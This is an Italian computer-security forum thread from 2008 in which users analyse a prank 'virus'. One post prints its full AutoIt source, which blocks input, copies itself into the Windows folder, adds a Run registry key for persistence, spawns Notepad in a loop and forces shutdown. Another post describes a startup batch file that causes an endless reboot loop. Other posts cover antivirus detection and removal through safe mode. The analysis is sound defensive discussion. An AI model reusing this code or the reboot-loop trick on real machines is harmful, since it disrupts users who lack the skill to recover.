Punto informatico Network
Login Esegui login | Non sei registrato? Iscriviti ora (è gratuito!)
Username: Password:
  • Annuncio Pubblicitario

La parola agli esperti.

Un virus si è intromesso nel tuo computer? Vuoi navigare in tutta sicurezza? Sono sicure le transazione online? Come impedire a malintenzionati di intromettersi nel tuo pc? Come proteggere i tuoi dati? Qui trovi le risposte a queste ed altre domande

La parola agli esperti.

Messaggioda spitfire10 » mar apr 15, 2008 8:10 pm

Avatar utente
spitfire10
Senior Member
Senior Member
 
Messaggi: 307
Iscritto il: dom ott 07, 2007 5:26 pm
Località: GORIZIA

Messaggioda ste_95 » mar apr 15, 2008 8:18 pm

Non mi sembra ci sia nulla di nuovo, per riavviare il computer basta scrivere shutdown -r da riga di comando, giusto? Quand'è così basta di conseguenza scrivere in un file di testo il medesimo comando salvando il file con l'estensione bat. Quindi ne crei un collegamento in Avvio Automatico o lo sposti direttamente e a ogni avvio il computer si riavvierà... [devil]
«A volte è meglio tacere e sembrare stupidi che aprir bocca e togliere ogni dubbio.» Oscar Wilde
Avatar utente
ste_95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 17271
Iscritto il: lun ago 06, 2007 11:19 am

Messaggioda ste_95 » mar apr 15, 2008 8:26 pm

Ho aperto il file sorgente e il codice è il seguente:

Codice: Seleziona tutto
#NoTrayIcon
BlockInput(1)
MsgBox(0,"Realizzato By"," .+* M4TT091 x°D",3)
MsgBox(0,"A Informazione...","Il tuo pc è spacciato ahaah",3)
$variabile1=@AutoItExe
FileCopy ($variabile1,"C:\WINDOWS\win32\Temp.exe")
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "AutoAvvio", "C:\WINDOWS\win32\Temp.exe")
While 1=1
Run ("notepad.exe")
Wend
If ProcessExists("notepad.exe") Then
   Shutdown(8)
ElseIf ProcessClose("notepad.exe") Then
   Shutdown(8)
   EndIf


Spieghiamolo e commentiamolo senza sapere un tubo di VB (Correggetemi se è un altro linguaggio).

Non visualizza icona nella system tray. BlockInput che fa? Blocca gli input? Poi ti dice da chi è stato realizzato (Immagino due che non avevano un tubo da fare) e che il tuo computer è spacciato.
Quindi crea il file C:\WINDOWS\win32\Temp.exe e scrive un valore di avvio per lo stesso di modo che venga eseguito a ogni avvio.
Poi verifica la condizione 1=1, questa restituirà sempre il valore booleano true in quanto 1 è uguale a uno sempre e comuqnue!
E dice: se uno è uguale a uno, apri il file notepad.exe. Chiudi il file notepad.exe e chiudi la sessione.

Questo è ciò che fa. Non mi sembra un virus tanto rivoluzionario...

Sono andato a intuito, se qualche conoscitore di VB ha qualche correzione da fare, non aspetto altro!
«A volte è meglio tacere e sembrare stupidi che aprir bocca e togliere ogni dubbio.» Oscar Wilde
Avatar utente
ste_95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 17271
Iscritto il: lun ago 06, 2007 11:19 am


Messaggioda The King of GnG » mar apr 15, 2008 8:41 pm

definizione di google

P.S.Non serve un "esperto" per una cosa del genere XD
People should just buy a cd and rip it. You are legal then" - William Henry Gates III (detto "Bill")
Avatar utente
The King of GnG
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 11144
Iscritto il: mer mar 02, 2005 8:24 pm
Località: La Biblioteca di Babele

Messaggioda ste_95 » mer apr 16, 2008 5:37 pm

Peraltro non è vero che nessun antivirus lo rileva. Tre antivirus lo rilevano, NOD lo vede danneggiato anche se non lo è.
Al momento anche Antivir lo rileva, ma glielo ho mandato io ieri, quindi saliamo a 4.
«A volte è meglio tacere e sembrare stupidi che aprir bocca e togliere ogni dubbio.» Oscar Wilde
Avatar utente
ste_95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 17271
Iscritto il: lun ago 06, 2007 11:19 am

Messaggioda SteelBolter » mer apr 16, 2008 10:30 pm

Io ho aggiornato avira antivir personal edition in questo momento e non mi ha trovato nulla...

Tu che versione hai?
Avatar utente
SteelBolter
Silver Member
Silver Member
 
Messaggi: 1110
Iscritto il: sab mag 26, 2007 8:04 pm

Messaggioda ste_95 » gio apr 17, 2008 6:26 am

E' normale, mi hanno risposto ieri alle 3 di pomeriggio dicendomi che lo avrebbero riconosciuto come TR/Autoit.AV, ma bisogna aspettare che distribuiscano l'aggiornamento.
«A volte è meglio tacere e sembrare stupidi che aprir bocca e togliere ogni dubbio.» Oscar Wilde
Avatar utente
ste_95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 17271
Iscritto il: lun ago 06, 2007 11:19 am

Messaggioda The King of GnG » gio apr 17, 2008 10:30 am

Ma perché fate perdere tempo agli analisti di antivir con queste bischerate? XD
People should just buy a cd and rip it. You are legal then" - William Henry Gates III (detto "Bill")
Avatar utente
The King of GnG
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 11144
Iscritto il: mer mar 02, 2005 8:24 pm
Località: La Biblioteca di Babele

Messaggioda clic » gio apr 17, 2008 11:57 am

se colpisce il pc di uno che con il computer ci lavora non è mica tanto una bischerata, non danneggia nulla ma costringe il povero sprovveduto ad interpellare un tecnico.
Avatar utente
clic
Bronze Member
Bronze Member
 
Messaggi: 931
Iscritto il: lun mar 17, 2008 9:03 pm

Messaggioda ste_95 » gio apr 17, 2008 12:01 pm

Direi che entrando in modalità provvisoria lo neutralizzi e poi lo elimini senza problemi.
«A volte è meglio tacere e sembrare stupidi che aprir bocca e togliere ogni dubbio.» Oscar Wilde
Avatar utente
ste_95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 17271
Iscritto il: lun ago 06, 2007 11:19 am

Messaggioda The King of GnG » gio apr 17, 2008 12:13 pm

clic ha scritto:se colpisce il pc di uno che con il computer ci lavora non è mica tanto una bischerata, non danneggia nulla ma costringe il povero sprovveduto ad interpellare un tecnico.


Già. Peccato che tutto sto chiacchierare di stà pagliacciata, che si potrebbe realizzare anche in batch, gli da una visibilità che non si merita. Direi che si dovrebbe dare la giusta importanza alle cose, e questa è una buffonata non un malware....
People should just buy a cd and rip it. You are legal then" - William Henry Gates III (detto "Bill")
Avatar utente
The King of GnG
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 11144
Iscritto il: mer mar 02, 2005 8:24 pm
Località: La Biblioteca di Babele

Messaggioda clic » gio apr 17, 2008 12:14 pm

Cosi come con le automobili c'è gente che apre la portiera, mette in moto e parte senza conoscere le leggi della termodinamica e il cliclo Otto, lo stesso avviene con i computer: ci sono persone che ci scrivono perché lo usano come sostituto della macchina da scrivere (vedi i traduttori) o che semplicemente comunicano con i parenti lontani.
Un antivirus deve essere in grado, per coloro che lo pagano, di essere in grado di poter rilevare anche quelli che per gente skillata puo apparire uno scherzo innocuo.
Tutto rigorosamente IMHO ;)
Avatar utente
clic
Bronze Member
Bronze Member
 
Messaggi: 931
Iscritto il: lun mar 17, 2008 9:03 pm

Messaggioda The King of GnG » gio apr 17, 2008 6:58 pm

clic ha scritto:Cosi come con le automobili c'è gente che apre la portiera, mette in moto e parte senza conoscere le leggi della termodinamica e il cliclo Otto, lo stesso avviene con i computer: ci sono persone che ci scrivono perché lo usano come sostituto della macchina da scrivere (vedi i traduttori) o che semplicemente comunicano con i parenti lontani.
Un antivirus deve essere in grado, per coloro che lo pagano, di essere in grado di poter rilevare anche quelli che per gente skillata puo apparire uno scherzo innocuo.
Tutto rigorosamente IMHO ;)


Fuffaware XD

C'è la possibilità dello 0,001% che una stron**ta simile entri in circolazione, e pure se lo facesse, non è robaccia che si replica. Ergo è una perdita di tempo, per me che ancora rispondo a stò thread per "esperti" e per Avira che deve impegnarci lo 0,1% del tempo quotidiano di uno dei suoi analisti XD
People should just buy a cd and rip it. You are legal then" - William Henry Gates III (detto "Bill")
Avatar utente
The King of GnG
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 11144
Iscritto il: mer mar 02, 2005 8:24 pm
Località: La Biblioteca di Babele

Messaggioda clic » gio apr 17, 2008 9:34 pm

Questo tipo di falsi virus sono classificati come jokes e alcuni antivirus li eliminano perché causa di problemi ai meno esperti che per inciso non sanno neanche dove sta di casa la modalità provvisoria.

Il fatto di rispondere è una scelta visto che siamo in democrazia e così tu hai detto la tua mentre io la mia [bleh]
Avatar utente
clic
Bronze Member
Bronze Member
 
Messaggi: 931
Iscritto il: lun mar 17, 2008 9:03 pm

Messaggioda The King of GnG » gio apr 17, 2008 10:29 pm

clic ha scritto:Il fatto di rispondere è una scelta visto che siamo in democrazia e così tu hai detto la tua mentre io la mia [bleh]


Democrazia? Se non sbaglio ancora non è stato decisa la forma di governo di Berlusconia. Aspettiamo prima i nuovi palinsesti XD

Joke? Oh please.... Fall.com per DOS era divertente perché almeno replicava l'effetto del virus Cascade, questo è uno sgorbio di "programmazione" e stop. Altro che joke....
People should just buy a cd and rip it. You are legal then" - William Henry Gates III (detto "Bill")
Avatar utente
The King of GnG
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 11144
Iscritto il: mer mar 02, 2005 8:24 pm
Località: La Biblioteca di Babele

Messaggioda spitfire10 » ven apr 18, 2008 12:17 am

The King of GnG ha scritto:
clic ha scritto:Il fatto di rispondere è una scelta visto che siamo in democrazia e così tu hai detto la tua mentre io la mia [bleh]


Democrazia? Se non sbaglio ancora non è stato decisa la forma di governo di Berlusconia. Aspettiamo prima i nuovi palinsesti XD

Joke? Oh please.... Fall.com per DOS era divertente perché almeno replicava l'effetto del virus Cascade, questo è uno sgorbio di "programmazione" e stop. Altro che joke....



Vacca boia!!
Mi sto sentendo in colpa per aver postato la cosa..... [cry] [cry]
Avatar utente
spitfire10
Senior Member
Senior Member
 
Messaggi: 307
Iscritto il: dom ott 07, 2007 5:26 pm
Località: GORIZIA

Messaggioda ste_95 » ven apr 18, 2008 6:10 am

spitfire10 ha scritto:Vacca boia!!
Mi sto sentendo in colpa per aver postato la cosa.....

[rotfl]

Questo non lo definirei come un joke, e neanche come un badjoke, perché non ti lasciano il sistema intatto, via ti prendi un colpo una volta e poi scoppi a ridere... Qui se non hai un minimo di esperienza/capacità con il computer, sei fritto!
«A volte è meglio tacere e sembrare stupidi che aprir bocca e togliere ogni dubbio.» Oscar Wilde
Avatar utente
ste_95
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 17271
Iscritto il: lun ago 06, 2007 11:19 am

Messaggioda clic » ven apr 18, 2008 6:17 am

spitfire10 ha scritto:Vacca boia!!
Mi sto sentendo in colpa per aver postato la cosa..... [cry] [cry]


[:D]

Io invece ti ringrazio ;)
Avatar utente
clic
Bronze Member
Bronze Member
 
Messaggi: 931
Iscritto il: lun mar 17, 2008 9:03 pm

Messaggioda The King of GnG » ven apr 18, 2008 2:08 pm

E perché dovresti? XD

Siamo ben al di sotto della soglia di attenzione, e francamente non ho certo voglia e tempo da perdere nell'aprire una guerra di religione su uno sgor.... ops, un finto malware XD
People should just buy a cd and rip it. You are legal then" - William Henry Gates III (detto "Bill")
Avatar utente
The King of GnG
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 11144
Iscritto il: mer mar 02, 2005 8:24 pm
Località: La Biblioteca di Babele


Torna a Sicurezza

Chi c’è in linea

Visitano il forum: Nessuno e 2 ospiti

Powered by phpBB © 2002, 2005, 2007, 2008 phpBB Group
Traduzione Italiana phpBB.it

megalab.it: testata telematica quotidiana registrata al Tribunale di Cosenza n. 22/09 del 13.08.2009, editore Master New Media S.r.l.; © Copyright 2008 Master New Media S.r.l. a socio unico - P.I. 02947530784. GRUPPO EDIZIONI MASTER Spa Tutti i diritti sono riservati. Per la pubblicità: Master Advertising